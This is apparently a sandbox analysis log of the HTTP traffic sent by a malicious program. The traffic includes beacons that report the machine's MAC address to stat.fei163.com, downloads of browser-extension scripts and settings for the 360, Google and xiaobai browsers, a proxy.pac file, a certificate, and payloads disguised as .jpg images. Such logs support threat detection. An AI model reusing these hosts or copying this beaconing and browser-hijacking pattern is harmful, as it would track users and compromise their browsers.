URL专业沙箱检测 -> http://47.114.164.183:88/http://47.114.164.183:88/zs.der	GET http://47.114.164.183:88/zs.der HTTP/1.1 HOST: 47.114.164.183 Connection: Close
URL专业沙箱检测 -> http://47.114.164.183:88/proxy.pac	GET /proxy.pac HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32; Trident/4.0) Host: 47.114.164.183:88
URL专业沙箱检测 -> http://stat.fei163.com:680/http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=test-PC&product_id=51	GET http://stat.fei163.com:680/api/index/index?status=1&shop_id=101308&mac=52540064DCC0&client_name=test-PC&product_id=51 HTTP/1.1 HOST: stat.fei163.com Connection: Close
URL专业沙箱检测 -> http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/content-script.js	GET http://down.ttwz07.com:88/cq/101308/360/content-script.js HTTP/1.1 HOST: down.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/content-script.js	GET http://down.ttwz07.com:88/cq/101308/xiaobai/content-script.js HTTP/1.1 HOST: down.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/content-script.js	GET http://down.ttwz07.com:88/cq/101308/google/content-script.js HTTP/1.1 HOST: down.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/manifest.txt	GET http://down.ttwz07.com:88/cq/101308/360/manifest.txt HTTP/1.1 HOST: down.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/360/Preferences.txt	GET http://down.ttwz07.com:88/cq/101308/360/Preferences.txt HTTP/1.1 HOST: down.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/manifest.txt	GET http://down.ttwz07.com:88/cq/101308/google/manifest.txt HTTP/1.1 HOST: down.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/google/Preferences.txt	GET http://down.ttwz07.com:88/cq/101308/google/Preferences.txt HTTP/1.1 HOST: down.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/path360.txt	GET http://sf.ttwz07.com:447/path360.txt HTTP/1.1 HOST: sf.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/manifest.txt	GET http://down.ttwz07.com:88/cq/101308/xiaobai/manifest.txt HTTP/1.1 HOST: down.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/Preferences.txt	GET http://down.ttwz07.com:88/cq/101308/xiaobai/Preferences.txt HTTP/1.1 HOST: down.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://down.ttwz07.com:88/http://down.ttwz07.com:88/cq/101308/xiaobai/paths.txt	GET http://down.ttwz07.com:88/cq/101308/xiaobai/paths.txt HTTP/1.1 HOST: down.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/zhaosf.txt	GET http://sf.ttwz07.com:447/SiFuUrlList/zhaosf.txt HTTP/1.1 HOST: sf.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/haosf.txt	GET http://sf.ttwz07.com:447/SiFuUrlList/haosf.txt HTTP/1.1 HOST: sf.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf945.txt	GET http://sf.ttwz07.com:447/SiFuUrlList/sf945.txt HTTP/1.1 HOST: sf.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/qusf.txt	GET http://sf.ttwz07.com:447/SiFuUrlList/qusf.txt HTTP/1.1 HOST: sf.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf33.txt	GET http://sf.ttwz07.com:447/SiFuUrlList/sf33.txt HTTP/1.1 HOST: sf.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/sf999.txt	GET http://sf.ttwz07.com:447/SiFuUrlList/sf999.txt HTTP/1.1 HOST: sf.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://sf.ttwz07.com:447/http://sf.ttwz07.com:447/SiFuUrlList/rand.txt	GET http://sf.ttwz07.com:447/SiFuUrlList/rand.txt HTTP/1.1 HOST: sf.ttwz07.com Connection: Close
URL专业沙箱检测 -> http://stat.fei163.com:680/api/index/index?status=1&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53	GET /api/index/index?status=1&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53 HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: zh-cn Referer: http://stat.fei163.com:680/api/index/index?status=1&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53 User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: stat.fei163.com:680
URL专业沙箱检测 -> http://63.141.246.178/101298/Ver.txt	POST /101298/Ver.txt HTTP/1.1 Accept: / Referer: http://63.141.246.178/101298/Ver.txt Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 63.141.246.178 Content-Length: 0 Cache-Control: no-cache
URL专业沙箱检测 -> http://63.141.246.178/101298/Good.jpg	GET /101298/Good.jpg HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: zh-cn Referer: http://63.141.246.178/101298/Good.jpg User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 63.141.246.178
URL专业沙箱检测 -> http://173.208.160.45:88/tongji.php?userid=101298&mac=52:54:00:64:DC:C0	GET /tongji.php?userid=101298&mac=52:54:00:64:DC:C0 HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: zh-cn Referer: http://173.208.160.45:88/tongji.php?userid=101298&mac=52:54:00:64:DC:C0 User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 173.208.160.45:88
URL专业沙箱检测 -> http://63.141.246.178/101298/better.jpg	GET /101298/better.jpg HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: zh-cn Referer: http://63.141.246.178/101298/better.jpg User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 63.141.246.178
URL专业沙箱检测 -> http://63.141.246.178/101298/best.jpg	GET /101298/best.jpg HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: zh-cn Referer: http://63.141.246.178/101298/best.jpg User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 63.141.246.178
URL专业沙箱检测 -> http://173.208.160.45:666/Ver.php	POST /Ver.php HTTP/1.1 Accept: / Referer: http://173.208.160.45:666/Ver.php Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: 173.208.160.45:666 Content-Length: 0 Cache-Control: no-cache
URL专业沙箱检测 -> http://stat.fei163.com:680/api/index/index?status=0&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53	GET /api/index/index?status=0&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53 HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: zh-cn Referer: http://stat.fei163.com:680/api/index/index?status=0&shop_id=101298&mac=52:54:00:64:DC:C0&client_name=test-PC&product_id=53 User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) Host: stat.fei163.com:680